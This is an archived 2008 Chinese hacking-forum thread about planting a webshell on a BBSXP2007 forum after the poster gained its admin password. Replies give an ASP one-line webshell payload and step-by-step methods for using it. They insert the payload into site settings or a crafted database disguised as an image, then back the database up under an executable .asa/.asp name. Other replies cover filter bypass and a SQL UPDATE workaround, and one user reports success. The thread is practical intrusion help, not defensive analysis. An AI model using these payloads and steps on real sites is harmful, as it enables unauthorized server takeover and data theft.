【3.A.S.T】网络安全爱好者's Archiver

黑客学习

valen886 发表于 2008-7-23 08:27

[讨论]BBSXP2007 Access版后台拿shell问题

[讨论]BBSXP2007 Access版后台拿shell问题
议题作者:Awolf
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])

  在测试一个BBSXP2007access版的漏洞,成功的得到了一个后台密码并进入后台。

  让人悲哀的是,后台没有办法开启上传功能,那么修改后台上传后缀直接传马的方法不行了,还有下载数据库插入小马然后备份的方法也走不通了。那么我们有什么方法从后台拿到shell?
  请问出了我上述两种方法外还有什么方法可以拿下shell?谢谢
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-3782.html]十三豆子[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

轻舞飞扬 发表于 2008-7-23 08:27

BBSXP后台有一个广告还是页面设置的地方,可以插一句话进数据库,然后备份数据库为ASA就可以了.我是十三豆子,不是十三颗豆子.bbs.tian6.com
[url=http://wpa.qq.com/msgrd?V=1&Uin=29773090&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子38 精华[url=http://forum.eviloctal.com/digest.php?authorid=3782]0[/url] 积分90 阅读权限40 性别男 在线时间144 小时 注册时间2005-4-19 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=3782]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]

[url=http://forum.eviloctal.com/space-uid-141734.html]゛小︷帅!﹊[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然

bbbbf 发表于 2008-7-23 08:27

表Admin

列username password .........
<%execute request("#")%>

上传恢复一下数据库。

再备份。

ok/你拿到shell了` [img]http://forum.eviloctal.com/images/smilies/yangcong/59.gif[/img]
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

sunnygirl 发表于 2008-7-23 08:27

引用:
引用第1楼十三豆子于2008-01-05 11:26发表的 :
BBSXP后台有一个广告还是页面设置的地方,可以插一句话进数据库,然后备份数据库为ASA就可以了.
恩,你说的地方我测试过了,我在“管理所有角色”的地方插入一句话,但是到数据库中被过滤得不成样子了,连接一句话出现乱码,没有想看到的那句!

[img]http://photo15.yupoo.com/20080106/092347_1790638488_m.jpg[/img]

不知道这位大哥说的是不是这个地方,还有如果是这个地方有办法绕过验证?小弟学浅,想了N久也不知道。。。。貌似过滤成这样无法绕过。
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

sherwood5 发表于 2008-7-23 08:27

引用:
引用第2楼゛小︷帅!﹊于2008-01-05 11:45发表的 :
表Admin

列username password .........
<%execute request("#")%>

.......
可以具体点不?前提是无法开通上传组建的!
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]

[url=http://forum.eviloctal.com/space-uid-141734.html]゛小︷帅!﹊[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然

周星星 发表于 2008-7-23 08:27

申明下,我没测试过。但是在其他的地方运用到过类似的方法

你可以参考下《自力更生搞定my动力系统》

1、先帮网站备份当前数据库。 &#39; 比如为bak.mdb

2、去down一份数据库。版本要一样

3、去掉nodown表`去掉全部的表。只留一个“admin”

4、在admin表里加一个<%execute request("fucker")%>

5、然后上传上去,当然是图片了。。

6、恢复数据库,我说的恢复不是恢复步骤1的数据库,而是步骤5的图片。

7、有的人会说网站会倒塌,应该不会,所以我说我没实践。但是我觉得这个办法是通杀的。

8、再一次备份当前数据库。 &#39; 比如为“asp.asp/test.mdb”,或者“asp.asa”


这个是理论上的思路……[img]http://forum.eviloctal.com/images/smilies/yangcong/62.gif[/img] [img]http://forum.eviloctal.com/images/smilies/yangcong/62.gif[/img]
引用:
Quote:
引用第2楼゛小︷帅!﹊于2008-01-05 11:45发表的 :
表Admin

列username password .........
<%execute request("#")%>

.......

可以具体点不?前提是无法开通上传组建的!
那我就无能为力了。[img]http://forum.eviloctal.com/images/smilies/yangcong/63.gif[/img]

全部都试一下吧。

把一句话加密什么的。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]

[url=http://forum.eviloctal.com/space-uid-67862.html]simpleboy[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

大圣 发表于 2008-7-23 08:28

引用:
引用第5楼゛小︷帅!﹊于2008-01-06 10:32发表的 :
申明下,我没测试过。但是在其他的地方运用到过类似的方法

你可以参考下《自力更生搞定my动力系统》

1、先帮网站备份当前数据库。 &#39; 比如为bak.mdb
.......
小弟对哪SHELL 不了解 这里看到了 好奇
第4步 和第5步是什么意思呢?

是上传图片 还是备份的数据库
还是 先上传数据库 然后再上传 图片木马 ??

好像都不对吧 求知  勿见笑只做安静的观众
帖子72 精华[url=http://forum.eviloctal.com/digest.php?authorid=67862]2[/url] 积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67862]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-141734.html]゛小︷帅!﹊[/url] [img]http://forum.eviloctal.com/images/avatars/14.gif[/img]
晶莹剔透§烈日灼然

kinsaang 发表于 2008-7-23 08:28

引用:
引用第6楼simpleboy于2008-01-06 15:26发表的 :


小弟对哪SHELL 不了解 这里看到了 好奇
第4步 和第5步是什么意思呢?

.......
难道我说模糊了?

先把一句话插到自己设置的数据库(.mdb)接着换扩展名(.jpg)上传

恢复(.jpg)。

没测试过。但是大部分的站点都能这样拿到shell。

可惜了。楼主要的webshell不支持上传
复制内容到剪贴板
代码:
Request 对象 错误 &#39;ASP 0104 : 80004005&#39;

不允许操作

/Utility/UpFile_Class.asp,行 36
原来是用2进制读了。

看来我的办法是不行的
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=276653168&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url] [url=http://wwp.icq.com/scripts/search.dll?to=276653168][img]http://forum.eviloctal.com/images/default/icq.gif[/img][/url]
帖子58 精华[url=http://forum.eviloctal.com/digest.php?authorid=141734]0[/url] 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 [url=http://www.xshacker.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=141734]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

bmwyun 发表于 2008-7-23 08:28

我又重新读了代码,还是没有找到可以利用的地方,除了可开启上传功能。
可是小弟学识有限,各位大大还有什么好方法? 恩, ゛小︷帅! 大哥的说得没错,基本上都可以通过上传来拿到shell,但是我就遇到一个BT不能上传的。看看能不能突破~~
期待ing
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

马自达 发表于 2008-7-23 08:28

测试发现:在网站配置中写入一句话木马.然后备份就可以了。。。
终于成功解决了
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-74560.html]anki[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

东莞军人 发表于 2008-7-23 08:28

上传设置里添加MDB类型文件,把含有一句话木马的MDB文件备份一下就可以了。
帖子34 精华[url=http://forum.eviloctal.com/digest.php?authorid=74560]0[/url] 积分129 阅读权限40 性别男 在线时间12 小时 注册时间2007-1-25 最后登录2008-5-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=74560]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

hycmx 发表于 2008-7-23 08:28

引用:
引用第10楼anki于2008-01-11 10:09发表的 :
上传设置里添加MDB类型文件,把含有一句话木马的MDB文件备份一下就可以了。
楼上的看清楚了
前提是不能开通上传的
还是感谢
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-74560.html]anki[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

骆宗平 发表于 2008-7-23 08:28

抱歉,是我没有看清楚,那为什么不能开启啊,不支持上传吗?? 你自己已经解决了哦 。。
帖子34 精华[url=http://forum.eviloctal.com/digest.php?authorid=74560]0[/url] 积分129 阅读权限40 性别男 在线时间12 小时 注册时间2007-1-25 最后登录2008-5-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=74560]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-46249.html]杀虫剂[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm2.jpg[/img]
晶莹剔透§烈日灼然

强劲力量 发表于 2008-7-23 08:28

也遇见了个BBSXP2007和楼主的一样。。。
上传组件无法开通不能上传文件,所以上传个一句话的图片数据库是行不通的。。
——————————————————
在网站配置中写入一句话木马.然后备份就可以了。。。
是不是进后台在基本设置——普通配置——站点名称等这些地方写入一句话??

在我写入到这些地方的时候发现语句过滤掉了,<%execute request("value")%>变成了<%execute request(      " />在网上找了个转换工具把<%execute request("value")%^>转化成┼硥捥瑵?敲畱獥?瘢污敵?帥>u     备份数据库打开发现
Active Server Pages 错误 &#39;ASP 0116&#39;

丢失脚本关闭分隔符

/bbs2/database/3.asp,行 47550

Script 块缺少脚本关闭标记(%>)。


是不是那里出现问题了,还是一句话出现错误了,应该怎么解决?黎叔很生气
[url=http://wpa.qq.com/msgrd?V=1&Uin=395697379&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子70 精华[url=http://forum.eviloctal.com/digest.php?authorid=46249]0[/url] 积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=46249]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-69392.html]yzy888[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

86981935 发表于 2008-7-23 08:28

引用:
引用第13楼杀虫剂于2008-01-12 23:51发表的 :
也遇见了个BBSXP2007和楼主的一样。。。
上传组件无法开通不能上传文件,所以上传个一句话的图片数据库是行不通的。。
——————————————————
在网站配置中写入一句话木马.然后备份就可以了。。。
是不是进后台在基本设置——普通配置——站点名称等这些地方写入一句话??
.......
你这应该是加入了防下载表了吧, 如果后台有执行SQL语句的功能,UPDATE一下就行了,一会去下一个BBSXP来试试看,
帖子21 精华[url=http://forum.eviloctal.com/digest.php?authorid=69392]0[/url] 积分71 阅读权限40 在线时间44 小时 注册时间2007-1-10 最后登录2008-7-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=69392]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然

珉头 发表于 2008-7-23 08:28

引用:
引用第13楼杀虫剂于2008-01-12 23:51发表的 :
也遇见了个BBSXP2007和楼主的一样。。。
上传组件无法开通不能上传文件,所以上传个一句话的图片数据库是行不通的。。
——————————————————
在网站配置中写入一句话木马.然后备份就可以了。。。
是不是进后台在基本设置——普通配置——站点名称等这些地方写入一句话??
.......
大哥的一句话是用什么转换呢?要用lake2的一个ascii2unicode的工具?感觉是你转换错误才会出现这种错误,你看下到数据库后被转成什么样子了就知道了
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-46249.html]杀虫剂[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm2.jpg[/img]
晶莹剔透§烈日灼然

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.